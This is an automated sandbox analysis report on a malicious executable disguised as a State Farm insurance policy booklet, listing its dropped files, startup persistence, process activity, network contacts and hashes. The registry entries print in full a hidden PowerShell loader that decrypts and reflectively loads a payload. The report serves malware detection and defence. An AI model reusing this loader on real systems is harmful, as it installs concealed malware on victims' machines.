Malware Analysis Report

2024-10-24 18:10

Sample ID 220610-v2jm9adfel
Target State-Farm-Auto-Insurance-Policy-Booklet.exe.zip
SHA256 02257b487a0c8a927a63e82adef0d9fafef53bac3bafbb98f417a5cbc3a9d6c0
Tags
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

02257b487a0c8a927a63e82adef0d9fafef53bac3bafbb98f417a5cbc3a9d6c0

Threat Level: Likely malicious

The file State-Farm-Auto-Insurance-Policy-Booklet.exe.zip was found to be: Likely malicious.

Malicious Activity Summary


Executes dropped EXE

Drops startup file

Checks computer location settings

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-06-10 17:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-06-10 17:29

Reported

2022-06-10 17:33

Platform

win7-20220414-en

Max time kernel

114s

Max time network

43s

Command Line

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Plevin.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SXuGZcKhlvoTHGcRbriizwmgfiNLw.zZAHomszxsi C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxTWHVHWmNLaGx2b1RIR2NSYnJpaXp3bWdmaU5Mdy56WkFIb21zenhzaQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi\ = "yvlobsgsdlyfg" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s

Network

N/A

Files

memory/2016-54-0x0000000000A80000-0x0000000000D14000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

MD5 dbc534854dd385e59a3f1906ddfb9020
SHA1 2b3062d82232ce10a8713829199769ff0d12e0fc
SHA256 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA512 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

memory/1616-55-0x0000000000000000-mapping.dmp

memory/1616-57-0x0000000075191000-0x0000000075193000-memory.dmp

memory/1360-58-0x0000000000000000-mapping.dmp

memory/1360-59-0x000000001B920000-0x000000001BC02000-memory.dmp

memory/1360-60-0x00000000003D0000-0x00000000003EC000-memory.dmp

memory/1360-61-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1360-62-0x00000000001D0000-0x00000000001D8000-memory.dmp

memory/1360-63-0x0000000002120000-0x00000000021C6000-memory.dmp

memory/1360-64-0x00000000009F0000-0x0000000000A24000-memory.dmp

memory/1360-65-0x0000000000A30000-0x0000000000A7A000-memory.dmp

memory/1360-66-0x0000000000530000-0x0000000000546000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-06-10 17:29

Reported

2022-06-10 17:33

Platform

win10v2004-20220414-en

Max time kernel

106s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Plevin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ISVTiCXTiQbcXcwgXUSwts.HIkwAElPUyfMKdNZZlMsAnLapQSLeWV C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxJU1ZUaUNYVGlRYmNYY3dnWFVTd3RzLkhJa3dBRWxQVXlmTUtkTlpabE1zQW5MYXBRU0xlV1Y='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv\ = "xjeunwqrnedfhcfuamca" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
US 52.168.112.66:443 tcp
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
CH 146.70.71.174:80 146.70.71.174 tcp
NL 2.17.222.14:80 tcp

Files

memory/3800-130-0x000001B4CEDC0000-0x000001B4CF054000-memory.dmp

memory/3800-131-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/3800-132-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

MD5 dbc534854dd385e59a3f1906ddfb9020
SHA1 2b3062d82232ce10a8713829199769ff0d12e0fc
SHA256 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA512 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

memory/4244-133-0x0000000000000000-mapping.dmp

memory/544-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\State-Farm-Auto-Insurance-Policy-Booklet.exe.log

MD5 fff5cbccb6b31b40f834b8f4778a779a
SHA1 899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256 b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA512 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

memory/3800-138-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

MD5 dbc534854dd385e59a3f1906ddfb9020
SHA1 2b3062d82232ce10a8713829199769ff0d12e0fc
SHA256 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA512 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

memory/544-139-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/544-140-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/544-141-0x000001B670240000-0x000001B670262000-memory.dmp